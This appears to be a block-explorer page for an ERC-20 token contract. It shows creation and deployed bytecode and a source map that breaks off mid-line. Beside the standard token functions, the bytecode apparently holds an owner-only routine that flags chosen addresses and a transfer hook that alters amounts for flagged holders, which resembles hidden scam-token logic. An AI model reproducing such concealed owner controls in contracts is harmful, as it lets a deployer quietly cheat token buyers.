ffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461102d91906115f0565b106110425761103b826110e0565b9050611046565b8190505b9392505050565b602a600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205414156110db576045600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600064089b90cec963190f1b44836110f89190611b1c565b6111029190611ba5565b9050919050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611143578082015181840152602081019050611128565b83811115611152576000848401525b50505050565b6000601f19601f8301169050919050565b600061117482611109565b61117e8185611114565b935061118e818560208601611125565b61119781611158565b840191505092915050565b600060208201905081810360008301526111bc8184611169565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111f9826111ce565b9050919050565b611209816111ee565b811461121457600080fd5b50565b60008135905061122681611200565b92915050565b6000819050919050565b61123f8161122c565b811461124a57600080fd5b50565b60008135905061125c81611236565b92915050565b60008060408385031215611279576112786111c4565b5b600061128785828601611217565b92505060206112988582860161124d565b9150509250929050565b60008115159050919050565b6112b7816112a2565b82525050565b60006020820190506112d260008301846112ae565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126112fd576112fc6112d8565b5b8235905067ffffffffffffffff81111561131a576113196112dd565b5b602083019150836020820283011115611336576113356112e2565b5b9250929050565b600080600060408486031215611356576113556111c4565b5b60006113648682870161124d565b935050602084013567ffffffffffffffff811115611385576113846111c9565b5b611391868287016112e7565b92509250509250925092565b6113a68161122c565b82525050565b60006020820190506113c1600083018461139d565b92915050565b6000806000606084860312156113e0576113df6111c4565b5b60006113ee86828701611217565b93505060206113ff86828701611217565b92505060406114108682870161124d565b9150509250925092565b600060ff82169050919050565b6114308161141a565b82525050565b600060208201905061144b6000830184611427565b92915050565b600060208284031215611467576114666111c4565b5b600061147584828501611217565b91505092915050565b611487816111ee565b82525050565b60006020820190506114a2600083018461147e565b92915050565b600080604083850312156114bf576114be6111c4565b5b60006114cd85828601611217565b92505060206114de85828601611217565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061152f57607f821691505b60208210811415611543576115426114e8565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115b28261122c565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156115e5576115e4611578565b5b600182019050919050565b60006115fb8261122c565b91506116068361122c565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561163b5761163a611578565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006116a2602583611114565b91506116ad82611646565b604082019050919050565b600060208201905081810360008301526116d181611695565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611734602683611114565b915061173f826116d8565b604082019050919050565b6000602082019050818103600083015261176381611727565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117c6602483611114565b91506117d18261176a565b604082019050919050565b600060208201905081810360008301526117f5816117b9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611858602283611114565b9150611863826117fc565b604082019050919050565b600060208201905081810360008301526118878161184b565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118c4601d83611114565b91506118cf8261188e565b602082019050919050565b600060208201905081810360008301526118f3816118b7565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611956602583611114565b9150611961826118fa565b604082019050919050565b6000602082019050818103600083015261198581611949565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119e8602383611114565b91506119f38261198c565b604082019050919050565b60006020820190508181036000830152611a17816119db565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a7a602683611114565b9150611a8582611a1e565b604082019050919050565b60006020820190508181036000830152611aa981611a6d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611ae6602083611114565b9150611af182611ab0565b602082019050919050565b60006020820190508181036000830152611b1581611ad9565b9050919050565b6000611b278261122c565b9150611b328361122c565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611b6b57611b6a611578565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611bb08261122c565b9150611bbb8361122c565b925082611bcb57611bca611b76565b5b82820490509291505056fea26469706673582212201b660b68608b04d2166c4578cee4116288cd2bb6300c8ad05643085e8b28fc2c64736f6c634300080c0033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c80638d525008116100a2578063a9059cbb11610071578063a9059cbb146102e5578063dd62ed3e14610315578063df44503114610345578063ebe2107114610375578063f2fde38b1461037f57610116565b80638d5250081461025b5780638da5cb5b1461027957806395d89b4114610297578063a457c2d7146102b557610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f157806370a0823114610221578063715018a61461025157610116565b806306fdde031461011b578063095ea7b3146101395780630a72c2f81461016957806318160ddd14610185575b600080fd5b61012361039b565b60405161013091906111a2565b60405180910390f35b610153600480360381019061014e9190611262565b61042d565b60405161016091906112bd565b60405180910390f35b610183600480360381019061017e919061133d565b610450565b005b61018d610521565b60405161019a91906113ac565b60405180910390f35b6101bd60048036038101906101b891906113c7565b61052b565b6040516101ca91906112bd565b60405180910390f35b6101db61055a565b6040516101e89190611436565b60405180910390f35b61020b60048036038101906102069190611262565b610563565b60405161021891906112bd565b60405180910390f35b61023b60048036038101906102369190611451565b61059a565b60405161024891906113ac565b60405180910390f35b6102596105e3565b005b6102636105f7565b60405161027091906113ac565b60405180910390f35b61028161063e565b60405161028e919061148d565b60405180910390f35b61029f610667565b6040516102ac91906111a2565b60405180910390f35b6102cf60048036038101906102ca9190611262565b6106f9565b6040516102dc91906112bd565b60405180910390f35b6102ff60048036038101906102fa9190611262565b610770565b60405161030c91906112bd565b60405180910390f35b61032f600480360381019061032a91906114a8565b610793565b60405161033c91906113ac565b60405180910390f35b61035f600480360381019061035a9190611451565b61081a565b60405161036c91906113ac565b60405180910390f35b61037d610863565b005b61039960048036038101906103949190611451565b6108fa565b005b6060600580546103aa90611517565b80601f01602080910402602001604051908101604052809291908181526020018280546103d690611517565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b60008061043861097e565b9050610445818585610986565b600191505092915050565b61045861063e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461048f57600080fd5b60005b8282905081101561051b5783600260008585858181106104b5576104b4611549565b5b90506020020160208101906104ca9190611451565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508080610513906115a7565b915050610492565b50505050565b6000600454905090565b60008061053661097e565b9050610543858285610b51565b61054e858585610bdd565b60019150509392505050565b60006012905090565b60008061056e61097e565b905061058f8185856105808589610793565b61058a91906115f0565b610986565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105eb610e5d565b6105f56000610edb565b565b6000600760003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461067690611517565b80601f01602080910402602001604051908101604052809291908181526020018280546106a290611517565b80156106ef5780601f106106c4576101008083540402835291602001916106ef565b820191906000526020600020905b8154815290600101906020018083116106d257829003601f168201915b5050505050905090565b60008061070461097e565b905060006107128286610793565b905083811015610757576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074e906116b8565b60405180910390fd5b6107648286868403610986565b60019250505092915050565b60008061077b61097e565b9050610788818585610bdd565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600760003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205414156108f8576108b43361059a565b600760003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b565b610902610e5d565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610972576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109699061174a565b60405180910390fd5b61097b81610edb565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156109f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ed906117dc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610a66576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5d9061186e565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b4491906113ac565b60405180910390a3505050565b6000610b5d8484610793565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bd75781811015610bc9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bc0906118da565b60405180910390fd5b610bd68484848403610986565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c4d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c449061196c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cbd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb4906119fe565b60405180910390fd5b6000610cca848484610f9f565b90506000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d53576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4a90611a90565b60405180910390fd5b828103600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e4391906113ac565b60405180910390a3610e5685858561104d565b5050505050565b610e6561097e565b73ffffffffffffffffffffffffffffffffffffffff16610e8361063e565b73ffffffffffffffffffffffffffffffffffffffff1614610ed9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed090611afc565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006045600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461102d91906115f0565b106110425761103b826110e0565b9050611046565b8190505b9392505050565b602a600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205414156110db576045600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600064089b90cec963190f1b44836110f89190611b1c565b6111029190611ba5565b9050919050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611143578082015181840152602081019050611128565b83811115611152576000848401525b50505050565b6000601f19601f8301169050919050565b600061117482611109565b61117e8185611114565b935061118e818560208601611125565b61119781611158565b840191505092915050565b600060208201905081810360008301526111bc8184611169565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111f9826111ce565b9050919050565b611209816111ee565b811461121457600080fd5b50565b60008135905061122681611200565b92915050565b6000819050919050565b61123f8161122c565b811461124a57600080fd5b50565b60008135905061125c81611236565b92915050565b60008060408385031215611279576112786111c4565b5b600061128785828601611217565b92505060206112988582860161124d565b9150509250929050565b60008115159050919050565b6112b7816112a2565b82525050565b60006020820190506112d260008301846112ae565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126112fd576112fc6112d8565b5b8235905067ffffffffffffffff81111561131a576113196112dd565b5b602083019150836020820283011115611336576113356112e2565b5b9250929050565b600080600060408486031215611356576113556111c4565b5b60006113648682870161124d565b935050602084013567ffffffffffffffff811115611385576113846111c9565b5b611391868287016112e7565b92509250509250925092565b6113a68161122c565b82525050565b60006020820190506113c1600083018461139d565b92915050565b6000806000606084860312156113e0576113df6111c4565b5b60006113ee86828701611217565b93505060206113ff86828701611217565b92505060406114108682870161124d565b9150509250925092565b600060ff82169050919050565b6114308161141a565b82525050565b600060208201905061144b6000830184611427565b92915050565b600060208284031215611467576114666111c4565b5b600061147584828501611217565b91505092915050565b611487816111ee565b82525050565b60006020820190506114a2600083018461147e565b92915050565b600080604083850312156114bf576114be6111c4565b5b60006114cd85828601611217565b92505060206114de85828601611217565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061152f57607f821691505b60208210811415611543576115426114e8565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115b28261122c565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156115e5576115e4611578565b5b600182019050919050565b60006115fb8261122c565b91506116068361122c565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561163b5761163a611578565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006116a2602583611114565b91506116ad82611646565b604082019050919050565b600060208201905081810360008301526116d181611695565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611734602683611114565b915061173f826116d8565b604082019050919050565b6000602082019050818103600083015261176381611727565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117c6602483611114565b91506117d18261176a565b604082019050919050565b600060208201905081810360008301526117f5816117b9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611858602283611114565b9150611863826117fc565b604082019050919050565b600060208201905081810360008301526118878161184b565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118c4601d83611114565b91506118cf8261188e565b602082019050919050565b600060208201905081810360008301526118f3816118b7565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611956602583611114565b9150611961826118fa565b604082019050919050565b6000602082019050818103600083015261198581611949565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119e8602383611114565b91506119f38261198c565b604082019050919050565b60006020820190508181036000830152611a17816119db565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a7a602683611114565b9150611a8582611a1e565b604082019050919050565b60006020820190508181036000830152611aa981611a6d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611ae6602083611114565b9150611af182611ab0565b602082019050919050565b60006020820190508181036000830152611b1581611ad9565b9050919050565b6000611b278261122c565b9150611b328361122c565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611b6b57611b6a611578565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611bb08261122c565b9150611bbb8361122c565b925082611bcb57611bca611b76565b5b82820490509291505056fea26469706673582212201b660b68608b04d2166c4578cee4116288cd2bb6300c8ad05643085e8b28fc2c64736f6c634300080c0033

Deployed Bytecode Sourcemap

136:496:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;906:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3521:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1941:222;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2332:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4280:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1843:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4961:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2496:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;518:112:3;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1834:85:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1117:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5682:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2817:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3064:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2169:102;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;342:170:3;;;:::i;:::-;;2707:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;906:98:1;960:13;992:5;985:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;906:98;:::o;3521:197::-;3604:4;3620:13;3636:12;:10;:12::i;:::-;3620:28;;3658:32;3667:5;3674:7;3683:6;3658:8;:32::i;:::-;3707:4;3700:11;;;3521:197;;;;:::o;1941:222::-;2039:7;:5;:7::i;:::-;2025:21;;:10;:21;;;2016:32;;;;;;2063:9;2058:90;2082:6;;:13;;2078:1;:17;2058:90;;;2133:4;2116:3;:14;2120:6;;2127:1;2120:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;2116:14;;;;;;;;;;;;;;;:21;;;;2097:3;;;;;:::i;:::-;;;;2058:90;;;;1941:222;;;:::o;2332:106::-;2393:7;2419:12;;2412:19;;2332:106;:::o;4280:286::-;4407:4;4423:15;4441:12;:10;:12::i;:::-;4423:30;;4463:38;4479:4;4485:7;4494:6;4463:15;:38::i;:::-;4511:27;4521:4;4527:2;4531:6;4511:9;:27::i;:::-;4555:4;4548:11;;;4280:286;;;;;:::o;1843:91::-;1901:5;1925:2;1918:9;;1843:91;:::o;4961:234::-;5049:4;5065:13;5081:12;:10;:12::i;:::-;5065:28;;5103:64;5112:5;5119:7;5156:10;5128:25;5138:5;5145:7;5128:9;:25::i;:::-;:38;;;;:::i;:::-;5103:8;:64::i;:::-;5184:4;5177:11;;;4961:234;;;;:::o;2496:125::-;2570:7;2596:9;:18;2606:7;2596:18;;;;;;;;;;;;;;;;2589:25;;2496:125;;;:::o;2457:101:0:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;518:112:3:-;565:7;591:20;:32;612:10;591:32;;;;;;;;;;;;;;;;584:39;;518:112;:::o;1834:85:0:-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;1117:102:1:-;1173:13;1205:7;1198:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1117:102;:::o;5682:427::-;5775:4;5791:13;5807:12;:10;:12::i;:::-;5791:28;;5829:24;5856:25;5866:5;5873:7;5856:9;:25::i;:::-;5829:52;;5919:15;5899:16;:35;;5891:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;6010:60;6019:5;6026:7;6054:15;6035:16;:34;6010:8;:60::i;:::-;6098:4;6091:11;;;;5682:427;;;;:::o;2817:189::-;2896:4;2912:13;2928:12;:10;:12::i;:::-;2912:28;;2950;2960:5;2967:2;2971:6;2950:9;:28::i;:::-;2995:4;2988:11;;;2817:189;;;;:::o;3064:149::-;3153:7;3179:11;:18;3191:5;3179:18;;;;;;;;;;;;;;;:27;3198:7;3179:27;;;;;;;;;;;;;;;;3172:34;;3064:149;;;;:::o;2169:102::-;2224:7;2250:3;:14;2254:9;2250:14;;;;;;;;;;;;;;;;2243:21;;2169:102;;;:::o;342:170:3:-;422:1;386:20;:32;407:10;386:32;;;;;;;;;;;;;;;;:37;382:124;;;474:21;484:10;474:9;:21::i;:::-;439:20;:32;460:10;439:32;;;;;;;;;;;;;;;:56;;;;382:124;342:170::o;2707:198:0:-;1727:13;:11;:13::i;:::-;2815:1:::1;2795:22;;:8;:22;;;;2787:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;2870:28;2889:8;2870:18;:28::i;:::-;2707:198:::0;:::o;587:96::-;640:7;666:10;659:17;;587:96;:::o;9914:370:1:-;10062:1;10045:19;;:5;:19;;;;10037:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10142:1;10123:21;;:7;:21;;;;10115:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10224:6;10194:11;:18;10206:5;10194:18;;;;;;;;;;;;;;;:27;10213:7;10194:27;;;;;;;;;;;;;;;:36;;;;10261:7;10245:32;;10254:5;10245:32;;;10270:6;10245:32;;;;;;:::i;:::-;;;;;;;;9914:370;;;:::o;10565:441::-;10695:24;10722:25;10732:5;10739:7;10722:9;:25::i;:::-;10695:52;;10781:17;10761:16;:37;10757:243;;10842:6;10822:16;:26;;10814:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10924:51;10933:5;10940:7;10968:6;10949:16;:25;10924:8;:51::i;:::-;10757:243;10685:321;10565:441;;;:::o;6562:837::-;6704:1;6688:18;;:4;:18;;;;6680:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;6780:1;6766:16;;:2;:16;;;;6758:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;6833:15;6851:38;6872:4;6878:2;6882:6;6851:20;:38::i;:::-;6833:56;;6900:19;6922:9;:15;6932:4;6922:15;;;;;;;;;;;;;;;;6900:37;;6970:6;6955:11;:21;;6947:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;7085:6;7071:11;:20;7053:9;:15;7063:4;7053:15;;;;;;;;;;;;;;;:38;;;;7285:7;7268:9;:13;7278:2;7268:13;;;;;;;;;;;;;;;;:24;;;;;;;;;;;7333:2;7318:26;;7327:4;7318:26;;;7337:6;7318:26;;;;;;:::i;:::-;;;;;;;;7355:37;7375:4;7381:2;7385:6;7355:19;:37::i;:::-;6670:729;;6562:837;;;:::o;1992:130:0:-;2066:12;:10;:12::i;:::-;2055:23;;:7;:5;:7::i;:::-;:23;;;2047:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1992:130::o;3059:187::-;3132:16;3151:6;;;;;;;;;;;3132:25;;3176:8;3167:6;;:17;;;;;;;;;;;;;;;;;;3230:8;3199:40;;3220:8;3199:40;;;;;;;;;;;;3122:124;3059:187;:::o;12455:294:1:-;12580:7;12652:2;12641:3;:7;12645:2;12641:7;;;;;;;;;;;;;;;;12629:3;:9;12633:4;12629:9;;;;;;;;;;;;;;;;:19;;;;:::i;:::-;:25;12625:118;;12677:11;12681:6;12677:3;:11::i;:::-;12670:18;;;;12625:118;12726:6;12719:13;;12455:294;;;;;;:::o;11594:158::-;11727:2;11716:3;:7;11720:2;11716:7;;;;;;;;;;;;;;;;:13;11712:34;;;11742:2;11732:3;:7;11736:2;11732:7;;;;;;;;;;;;;;;:12;;;;11712:34;11594:158;;;:::o;11779:92::-;11825:7;11858:11;11846:9;11842:1;:13;;;;:::i;:::-;:27;;;;:::i;:::-;11835:34;;11779:92;;;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1601:117;1710:1;1707;1700:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:117::-;3603:1;3600;3593:12;3617:117;3726:1;3723;3716:12;3740:117;3849:1;3846;3839:12;3880:568;3953:8;3963:6;4013:3;4006:4;3998:6;3994:17;3990:27;3980:122;;4021:79;;:::i;:::-;3980:122;4134:6;4121:20;4111:30;;4164:18;4156:6;4153:30;4150:117;;;4186:79;;:::i;:::-;4150:117;4300:4;4292:6;4288:17;4276:29;;4354:3;4346:4;4338:6;4334:17;4324:8;4320:32;4317:41;4314:128;;;4361:79;;:::i;:::-;4314:128;3880:568;;;;;:::o;4454:704::-;4549:6;4557;4565;4614:2;4602:9;4593:7;4589:23;4585:32;4582:119;;;4620:79;;:::i;:::-;4582:119;4740:1;4765:53;4810:7;4801:6;4790:9;4786:22;4765:53;:::i;:::-;4755:63;;4711:117;4895:2;4884:9;4880:18;4867:32;4926:18;4918:6;4915:30;4912:117;;;4948:79;;:::i;:::-;4912:117;5061:80;5133:7;5124:6;5113:9;5109:22;5061:8